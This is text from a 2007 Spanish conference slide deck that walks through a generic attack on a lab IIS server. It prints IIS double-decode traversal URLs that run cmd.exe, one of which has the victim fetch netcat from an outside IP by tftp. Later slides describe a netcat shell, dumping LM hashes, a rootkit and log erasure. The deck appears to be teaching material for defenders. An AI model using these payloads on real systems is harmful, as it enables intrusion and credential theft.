Universidad Simón Bolívar LACNIC X - Marzo 2007 - Margarita La Praxis del Cracker Miguel Torrealba S. (mtorrealba@usb.ve) Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita
Laboratorio de Seguridad en Tecnología de la Información USB GISTI Laboratorio de Seguridad en Tecnología de la Información
“La seguridad informática práctica es una sucesión de acciones y reacciones, de ataques y de defensas”. Simson Garfinkel y Eugene Spafford (1999)
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Footprinting (Hallar el Rastro) La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Scanning (Exploración) La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 http://jeremias.nul.usb.ve - La salida ya provee un indicio del “servidor web” que se está ejecutando y del puerto que está atendiendo las peticiones - Empleando otras herramientas como “nmap” de Fyodor, que identifican el sistema operativo usando “TCP Stack Fingerprinting” se puede obtener una información más confiable La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Enumeration (Enumeración) La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Gainning Access (Ganar Acceso) La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\ - Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede examinar el contenido de cualquier carpeta del sistema víctima. - Para lograr eso solo requiere ejecutar el comando “dir” de la consola de comandos a través del servidor web La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\ - ..%255c.. = ..(%25)5c.. = ..%5c .. = ..(%5c).. = .. \ .. http://jeremias.nul.usb.ve/scripts/..\../..\../winnt/system32/cmd.exe?c+dir+c:\ - Estructura lógica del disco de Jeremias: C: \ Inetpub \ scripts \ Winnt \ system32 \ La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+c:\winnt/system32/tftp.exe+-i+159.90.31.161+get+nc.exe - Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede ejecutar el cliente ftp para transferir los archivos que desee al sistema víctima. La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 http://jeremias.nul.usb.ve/scripts/..%255c../..%255c../winnt/system32/cmd.exe?c+dir+c:\Inetpub\scripts - Explotando la vulnerabilidad “Decode” del IIS 4.0 y 5.0, el Cracker puede verificar que el archivo que deseaba transferir al sistema víctima llegó correctamente y en cual carpeta reposa. La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Hora de transferir un “exploit” - “Httpodbc.dll” es una biblioteca de enlace dinámica que permitirá al Cracker ejecutar, por medio del navegador, un programa que elevará los privilegios de ejecución y proveerá una interfaz más amigable. Se podrá así, ejecutar cualquier otro programa que se quiera, explotando la misma vulnerabilidad “Decode” del IIS 4.0 y 5.0 - Para el “servidor web” del sistema de la víctima este programa parecerá un “código script” que ha sido colocado para que los usuarios finales lo ejecuten La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Ya es posible ejecutar, en forma más fácil, cualquier comando del sistema de operación a través del “servidor web” IIS 4.0 o 5.0 La Praxis del Cracker – MTS – Margarita 2007
Escalating Privilege (Escalar Privilegios) MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Con esta orden se procede a ejecutar “NETCAT” la “navaja del ejército suizo” de “Hackers” de sombrero blanco y negro, que activa una consola de comandos en el puerto 7001 del sistema víctima Un “nuevo” servicio de comandos queda escuchando desde ese instante La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Desde una consola de comandos local –el atacante- ejecuta ahora un “telnet” al puerto 7001 del sistema de la víctima La idea es disponer de un “login remoto” que permita ejecutar comandos en el sistema víctima Telnet puede operar entre equipos con diferentes Sistemas de Operación y provee un “terminal virtual en la red” La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Con el Telnet se ha establecido una conexión TCP a la consola de comandos que “escucha” peticiones en el puerto 7001 del sistema víctima. Recuérdese que Telnet maneja ambos extremos del canal en forma simétrica Telnet permite además ver la salida de la ejecución de la órdenes remotas en la pantalla local. Es un servicio “transparente” Cualquier orden en el sistema víctima es posible de ser ejecutada, con todos los privilegios y en forma tan amigable que parecería ser un comando local La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
Pilfering (Ratería, Vileza, Bajeza, Ruindad) MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 El Cracker extrae entonces las cuentas y los LM Hashes de las contraseñas. Posteriormente puede usar un programa tipo “Crackeador” La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Esta es una posible salida de lo que se obtendría. De esta forma el Cracker puede ahora suplantar a los usuarios autorizados en el sistema La Praxis del Cracker – MTS – Margarita 2007
Creating Backdoors (Crear las Puertas Traseras) MÉTODO GENÉRICO DE ATAQUE Creating Backdoors (Crear las Puertas Traseras) La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Ahora el Cracker puede “sembrar” calquier programa tipo “backdoor” que le permita volver a entrar en el sistema víctima y ganar privilegios, incluso si la vulnerabilidad “Decode” del IIS 4.0 y 5.0 es subsanada La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Rootkit HD 1.0 – versión de evaluación - Opera en sistemas WNT/W2K/WXP Parecido a un “troyano”, pero con características adicionales para ocultar su existencia y ejecución. Intercepta las llamadas a la API Win32 de Windows y altera la respuesta Genera un nuevo servicio “Hacker Defender 100” sobre cualquier puerto del sistema víctima y se comunica con el atacante a través de un programa cliente “bdclient” Puede adaptar su funcionamiento para disponer de distintas formas de operación Provee facilidad de contraseña para controlar su ejecución La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Covering Tracks (Cubrir las Huellas) La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Finalmente, si se han transferido programas para alterar los “logs”, el Cracker puede borrar fácilmente toda “huella” de su actividad. En caso contrario puede hacerlo manualmente La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007
MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007 Un administrador medianamente experimentado sospechará de inmediato si observa una salida como la anterior y la de abajo La Praxis del Cracker – MTS – Margarita 2007
La Praxis del Cracker – MTS – Margarita 2007 _________________________________ CIERRE “Conoced al enemigo y conoceos vos mismos; en cien batallas nunca correréis ningún peligro”. Sun Tzu El Arte de la Guerra La Praxis del Cracker – MTS – Margarita 2007